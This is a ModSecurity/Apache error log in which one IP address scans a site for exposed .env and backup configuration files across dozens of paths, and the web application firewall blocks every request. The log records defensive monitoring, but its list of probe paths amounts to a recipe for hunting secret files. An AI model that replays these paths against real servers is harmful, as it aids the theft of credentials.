[Mon Nov 24 09:48:40.193859 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5gAAAAM"]
[Mon Nov 24 09:48:40.194103 2025] [:error] [pid 289422] [client 45.148.10.174:56050] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSQb6KuPUsqg8dzYKhNY5gAAAAM"]
[Mon Nov 24 09:48:40.215427 2025] [authz_core:error] [pid 289422] [client 45.148.10.174:56050] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Mon Nov 24 09:48:40.237315 2025] [authz_core:error] [pid 289422] [client 45.148.10.174:56050] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Mon Nov 24 09:48:40.342045 2025] [:error] [pid 290997] [client 45.148.10.174:56060] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aSQb6DEQeViPmlCcx7aBYgAAAAg"]
[Mon Nov 24 09:48:40.342284 2025] [:error] [pid 290997] [client 45.148.10.174:56060] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aSQb6DEQeViPmlCcx7aBYgAAAAg"]
[Mon Nov 24 09:48:40.342555 2025] [:error] [pid 290997] [client 45.148.10.174:56060] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aSQb6DEQeViPmlCcx7aBYgAAAAg"]
[Mon Nov 24 09:48:40.364137 2025] [:error] [pid 290997] [client 45.148.10.174:56060] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSQb6DEQeViPmlCcx7aBYwAAAAg"]
[Mon Nov 24 09:48:40.364372 2025] [:error] [pid 290997] [client 45.148.10.174:56060] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSQb6DEQeViPmlCcx7aBYwAAAAg"]
[Mon Nov 24 09:48:40.364598 2025] [:error] [pid 290997] [client 45.148.10.174:56060] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aSQb6DEQeViPmlCcx7aBYwAAAAg"]
[Mon Nov 24 09:48:40.439581 2025] [:error] [pid 289434] [client 45.148.10.174:56064] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aSQb6Ekegqg-SpMlpG6ZoQAAAAU"]
[Mon Nov 24 09:48:40.439836 2025] [:error] [pid 289434] [client 45.148.10.174:56064] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aSQb6Ekegqg-SpMlpG6ZoQAAAAU"]
[Mon Nov 24 09:48:40.440013 2025] [:error] [pid 289434] [client 45.148.10.174:56064] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aSQb6Ekegqg-SpMlpG6ZoQAAAAU"]
[Mon Nov 24 09:48:40.521815 2025] [:error] [pid 289419] [client 45.148.10.174:56076] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSQb6Nu678UZNKPYNh9a7QAAAAA"]
[Mon Nov 24 09:48:40.522062 2025] [:error] [pid 289419] [client 45.148.10.174:56076] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSQb6Nu678UZNKPYNh9a7QAAAAA"]
[Mon Nov 24 09:48:40.522249 2025] [:error] [pid 289419] [client 45.148.10.174:56076] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aSQb6Nu678UZNKPYNh9a7QAAAAA"]
[Mon Nov 24 09:48:40.785480 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKQAAAAY"]
[Mon Nov 24 09:48:40.785714 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKQAAAAY"]
[Mon Nov 24 09:48:40.785885 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKQAAAAY"]
[Mon Nov 24 09:48:40.807546 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKgAAAAY"]
[Mon Nov 24 09:48:40.807796 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKgAAAAY"]
[Mon Nov 24 09:48:40.807985 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKgAAAAY"]
[Mon Nov 24 09:48:40.836149 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKwAAAAY"]
[Mon Nov 24 09:48:40.836379 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKwAAAAY"]
[Mon Nov 24 09:48:40.836565 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSQb6Hrb64iTDEMENNYIKwAAAAY"]
[Mon Nov 24 09:48:40.860007 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILAAAAAY"]
[Mon Nov 24 09:48:40.860336 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILAAAAAY"]
[Mon Nov 24 09:48:40.860587 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILAAAAAY"]
[Mon Nov 24 09:48:40.884796 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILQAAAAY"]
[Mon Nov 24 09:48:40.885020 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILQAAAAY"]
[Mon Nov 24 09:48:40.885197 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILQAAAAY"]
[Mon Nov 24 09:48:40.909039 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILgAAAAY"]
[Mon Nov 24 09:48:40.909386 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILgAAAAY"]
[Mon Nov 24 09:48:40.909631 2025] [:error] [pid 290074] [client 45.148.10.174:56082] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aSQb6Hrb64iTDEMENNYILgAAAAY"]
[Mon Nov 24 09:48:40.987932 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aSQb6NYYOaaNfnpwja-N_QAAAAE"]
[Mon Nov 24 09:48:40.988240 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aSQb6NYYOaaNfnpwja-N_QAAAAE"]
[Mon Nov 24 09:48:40.988407 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aSQb6NYYOaaNfnpwja-N_QAAAAE"]
[Mon Nov 24 09:48:41.150023 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OAgAAAAE"]
[Mon Nov 24 09:48:41.150263 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OAgAAAAE"]
[Mon Nov 24 09:48:41.150487 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OAgAAAAE"]
[Mon Nov 24 09:48:41.172909 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OAwAAAAE"]
[Mon Nov 24 09:48:41.173160 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OAwAAAAE"]
